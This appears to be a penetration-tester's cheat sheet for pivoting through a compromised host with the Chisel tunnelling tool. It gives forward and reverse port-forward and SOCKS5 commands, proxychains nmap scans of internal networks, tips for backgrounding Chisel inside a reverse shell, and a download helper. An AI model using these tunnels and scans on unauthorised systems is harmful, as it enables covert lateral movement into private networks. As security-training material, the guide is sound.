Port Forwarding with Chisel
Usage
Requires a copy of the Chisel binary on:
- The target host
- The attacker's host
- Download from the Releases Page
Example Commands
Chisel also supports authenticated proxies to prevent unwanted connections
Individual Port Forwarding
NOTE:?If you plan on running the?chisel server on the target, ensure the traffic is allowed through any firewalls. In general, running the?chisel server on the attack box is a safer bet
Network Diagram
SCENARIO
--------
Services on TARGET BOX is listening internally on 127.0.0.1 on TCP port 8001 and TCP port 8443
Run a CHISEL SERVER ON TARGET BOX and connect to it using a CHISEL CLIENT ON ATTACK BOX
Open 127.0.0.1:8001 on attack box and port forward to 127.0.0.1:8001 on target
Open 127.0.0.1:8443 on attack box and port forward to 127.0.0.1:8443 on target
CHISEL CLIENT and CHISEL SERVER establish a TCP session using HTTP web sockets
The port forwarding is secured between the two using SSH tunnels flowing through the web sockets
.---------------. .---------------.
| | | |
| ATTACK BOX | ___________________________________ | TARGET BOX |
| | | ===============>> | | |
| chisel client | ,=====[SSH TUNNEL]=====| [HTTP WEB SOCKET] |=====[SSH TUNNEL]=====>> | chisel server |
| | | |___________________________________| | | |
'---------------' | | '---------------'
| |
127.0.0.1:8001 --| |--127.0.0.1:8001
127.0.0.1:8443 --' '--127.0.0.1:8443Chisel Server on Target
- Chisel server is listening on?
TCP/51234 - Make sure this port is open in the firewall
/tmp/chisel server --socks5 --port 51234 Chisel Client on Attack Box
- Example shows multiple port forwards
- You can specify one or many port forwards
- Add or remove port forward declarations as needed
/tmp/chisel client target-box-ip:51234 127.0.0.1:8001:127.0.0.1:8001 127.0.0.1:8443:127.0.01:8443Example command
.\chisel.exe client target-box-ip:51234 127.0.0.1:8001:127.0.0.1:8001 127.0.0.1:8443:127.0.01:8443
^ ^
| |____attack-ip:attack-port:target-ip:target-port
|
|________attack-ip:attack-port:target-ip:target-portSyntax explanation
Reverse Individual Port Forwarding
- A service on a compromised host is listening on?
127.0.0.1 - Run the Chisel server on the attack box in reverse mode and connect from the target
- Specify one or many reverse port forwards on the client
- Open a port on attack box and forward traffic to remote port
Network Diagram
SCENARIO
--------
Services on TARGET BOX is listening internally on 127.0.0.1 on TCP port 8001 and TCP port 8443
Run a CHISEL SERVER ON ATTACK BOX and connect to it using a CHISEL CLIENT ON TARGET BOX
Open 127.0.0.1:8001 on attack box and port forward to 127.0.0.1:8001 on target
Open 127.0.0.1:8443 on attack box and port forward to 127.0.0.1:8443 on target
CHISEL CLIENT and CHISEL SERVER establish a TCP session using HTTP web sockets
The port forwarding is secured between the two using SSH tunnels flowing through the web sockets
.---------------. .---------------.
| | | |
| ATTACK BOX | ___________________________________ | TARGET BOX |
| | | <<=============== | | |
| chisel server | ,=====[SSH TUNNEL]=====| [HTTP WEB SOCKET] |=====[SSH TUNNEL]=====>> | chisel client |
| | | |___________________________________| | | |
'---------------' | | '---------------'
| |
127.0.0.1:8001 --| |--127.0.0.1:8001
127.0.0.1:8443 --' '--127.0.0.1:8443Chisel Server on Attack Box
./chisel server --reverse --port 51234Chisel Client on Target
- Example command shows multiple port forwards
- You can specify one or many port forwards
- Add or remove port forward declarations as needed
/tmp/chisel client attack-box-ip:51234 R:8001:127.0.0.1:8001 R:8443:127.0.01:8443Example command
.\chisel.exe client attack-box-ip:51234 R:8001:127.0.0.1:8001 R:8443:127.0.01:8443
^ ^
| |___ attack-ip:attack-port:target-ip:target-port
|
|___ attack-ip:attack-port:target-ip:target-port
# "R" is shorthand for "127.0.0.1"
# Effectively, listen on 127.0.0.1 on attack boxSyntax explanation
Forward Dynamic SOCKS Proxy
- Run the Chisel server on the target box
- Use the target box as a jump host to reach additional targets routable by the target
- The traffic flows forward to the target box, which acts as a transparent SOCKS proxy
SOCKS operates at layer 4 and up on the OSI model. Ping -- or ICMP -- is a layer 3 protocol and does not flow over SOCKS. So, you cannot ping targets through a SOCKS proxy.
Network Diagram
SCENARIO
--------
You have landed on a target that has access to ADDITIONAL TARGET(s) and/or ADDITIONAL ROUTE(s)
Run a CHISEL SERVER ON TARGET BOX and connect to it using a CHISEL CLIENT ON ATTACK BOX
Open 127.0.0.1:50080 on attack box and use this TCP connection as a SOCKS5 proxy
All traffic flowing through the SOCKS5 proxy will be routed by TARGET BOX to any specified destination
CHISEL CLIENT and CHISEL SERVER establish a TCP session using HTTP web sockets
The port forwarding is secured between the two using SSH tunnels flowing through the web sockets
.---------------. .---------------.
| | ___________________________________ | | .----. .----.
| ATTACK BOX | | ===============>> | | TARGET BOX | <<===================>> | | .----. | |
| | ,=====[SSH TUNNEL]=====| [HTTP WEB SOCKET] |=====[SSH TUNNEL]=====>> | | -----SOCKS5 PROXY-----> '----' | | '----'
| chisel client | | |___________________________________| | chisel server | <<========:|:========>> .----. '----' .----.
| | | | | |'| | | | |
'---------------' | '---------------' |'| '----' '----'
| |'| ADDITIONAL TARGETS
127.0.0.1:50080--' =========== '| OR NETWORKS
127.0.0.1:8080 <------------'|
============='
"socks5 127.0.0.1 50080" in proxychains4.conf
proxychains -q nmap -Pn -sT --top-ports 500 <target(s)>
curl --proxy "socks5://127.0.0.1:50080" http://127.0.0.1:8080Chisel Server on Target
- Chisel server is listening on TCP port 51234
- Make sure this port is open in the firewall
.\chisel.exe server --socks5 --port 51234 Chisel Client on Attack Box
/tmp/chisel client target-box-ip:51234 50080:socksExample command:?Open?TCP/50080 as the SOCKS5 proxy port on attack box
/tmp/chisel client target-box-ip:51234 50080:socks
^
|____attack-port:socksSyntax explanation
Reverse Dynamic SOCKS Proxy
- Run the Chisel server on the attack box in reverse mode
- Connect to the Chisel server from the target and specify a reverse port forward
- The traffic flows through the port on the attack box in reverse to the target box, which acts as a transparent SOCKS proxy
SOCKS operates at layer 4 and up on the OSI model. Ping -- or ICMP -- is a layer 3 protocol and does not flow over SOCKS. So, you cannot ping targets through a SOCKS proxy.
Network Diagram
SCENARIO
--------
You have landed on a target that has access to ADDITIONAL TARGET(s) and/or ADDITIONAL ROUTE(s)
Run a CHISEL SERVER ON TARGET BOX and connect to it using a CHISEL CLIENT ON ATTACK BOX
Open 127.0.0.1:50080 on attack box and use this TCP connection as a SOCKS5 proxy
All traffic flowing through the SOCKS5 proxy will be routed by TARGET BOX to any specified destination
CHISEL CLIENT and CHISEL SERVER establish a TCP session using HTTP web sockets
The port forwarding is secured between the two using SSH tunnels flowing through the web sockets
.---------------. .---------------.
| | ___________________________________ | | .----. .----.
| ATTACK BOX | | <<=============== | | TARGET BOX | <<===================>> | | .----. | |
| | ,=====[SSH TUNNEL]=====| [HTTP WEB SOCKET] |=====[SSH TUNNEL]=====>> | | -----SOCKS5 PROXY-----> '----' | | '----'
| chisel client | | |___________________________________| | chisel server | <<========:|:========>> .----. '----' .----.
| | | | | |'| | | | |
'---------------' | '---------------' |'| '----' '----'
| |'| ADDITIONAL TARGETS
127.0.0.1:50080--' =========== '| OR NETWORKS
127.0.0.1:8080 <------------'|
============='
"socks5 127.0.0.1 50080" in proxychains4.conf
proxychains -q nmap -Pn -sT --top-ports 500 <target(s)>
curl --proxy "socks5://127.0.0.1:50080" http://127.0.0.1:8080Chisel Server on Attack Box
/tmp/chisel server --reverse --port 51234Chisel Client on Target
.\chisel.exe client attack-box-ip:51234 R:50080:socksExample command: Open?TCP/50080 as the SOCKS5 proxy port on attack box
.\chisel.exe client attack-box-ip:51234 R:50080:socks
^
|___ R:attack-port:socks
"R" is shorthand for "127.0.0.1"
Effectively, listen on 127.0.0.1 on attack boxSyntax explanation
Proxychains
proxychains is used for dynamic port scanning when using?Forward?or?Reverse Dynamic SOCKS Proxy
sudo nano /etc/proxychains4.confIn the example below, this assumes you've used?tcp/50080 as the SOCKS5 proxy port (as shown in the example command above). We?must specify?socks5 in the?[ProxyList] section, as this is the protocol supported by Chisel.
[ProxyList]
socks5 127.0.0.1 50080Port Scanning via SOCKS Proxy
With SOCKS, you must use the?-sT flag to make a full TCP connection through the proxy. The SOCKS proxy cannot track TCP states when?-sS or half-open scans are used.
Scanning?127.0.0.1 -- in this case -- causes the traffic to flow through the SOCKS session, come out the other side of the proxy on the target and effectively scan the loopback adapter on the target side.
# TCP connect scans are brutally slow, use top 1,000 ports
sudo proxychains -q nmap -Pn -sT --top-ports 1000 -T4 -sC -sV 127.0.0.1Reverse Shell Tips
Run Chisel in the Background
Running chisel in the foreground in a reverse shell will render your shell useless, adding these notes here as a way to work around this.
Linux
Client Mode
chisel client 10.0.0.2:8080 R:127.0.0.1:33060:127.0.0.1:3306 R:127.0.0.1:8800:127.0.0.1:80 &Background a process with &
Server Mode
chisel server --port 8080 --reverse &Background a process with &
Windows
PowerShell
Client Mode
$scriptBlock = { C:\Windows\Temp\chisel.exe client 10.0.0.2:8080 R:127.0.0.1:33060:127.0.0.1:3306 R:127.0.0.1:8800:127.0.0.1:80 }Start-Job -ScriptBlock $scriptBlockStore a PowerShell scriptblock in the?$scriptBlock variable and run in the background with?Start-Job
Server Mode
Note that in server mode, you'll need to make sure your port is allowed through the firewall.
$scriptBlock = { C:\Windows\Temp\chisel.exe server --port 50001 --socks5 }Start-Job -ScriptBlock $scriptBlockStore a PowerShell scriptblock in the?$scriptBlock variable and run in the background with?Start-Job
Bash Function to Download Chisel Binaries
I've added this function to my?~/.zshrc file so that I can just invoke the function at any time to download the Linux and Windows chisel binaries.
Show / Hide Code Block
function download_chisel() {
# Variables
download_base_url='https://github.com/jpillora/chisel/releases/download'
tags_base_url='https://github.com/jpillora/chisel/tags'
linux_output_name='chisel.gz'
linux32_output_name='chisel32.gz'
windows_output_name='chisel.exe.gz'
windows32_output_name='chisel32.exe.gz'
url_version=$(curl -s $tags_base_url | grep 'releases/tag/v' | head -n 1 | cut -d '>' -f 3 | cut -d '<' -f 1)
binary_version=$(echo $url_version | tr -d 'v')
linux_binary_name="chisel_${binary_version}_linux_amd64.gz"
linux32_binary_name="chisel_${binary_version}_linux_386.gz"
windows_binary_name="chisel_${binary_version}_windows_amd64.gz"
windows32_binary_name="chisel_${binary_version}_windows_386.gz"
linux_download_url="${download_base_url}/${url_version}/${linux_binary_name}"
linux32_download_url="${download_base_url}/${url_version}/${linux32_binary_name}"
windows_download_url="${download_base_url}/${url_version}/${windows_binary_name}"
windows32_download_url="${download_base_url}/${url_version}/${windows32_binary_name}"
# Download, extract, set mode
curl -sL $linux_download_url -o "$PWD/${linux_output_name}"
curl -sL $linux32_download_url -o "$PWD/${linux32_output_name}"
curl -sL $windows_download_url -o "$PWD/${windows_output_name}"
curl -sL $windows32_download_url -o "$PWD/${windows32_output_name}"
gunzip $linux_output_name > /dev/null
gunzip $linux32_output_name > /dev/null
gunzip $windows_output_name > /dev/null
gunzip $windows32_output_name > /dev/null
chmod u+x ./chisel > /dev/null
echo "Linux and Windows chisel binaries downloaded and unarchived in $PWD"
}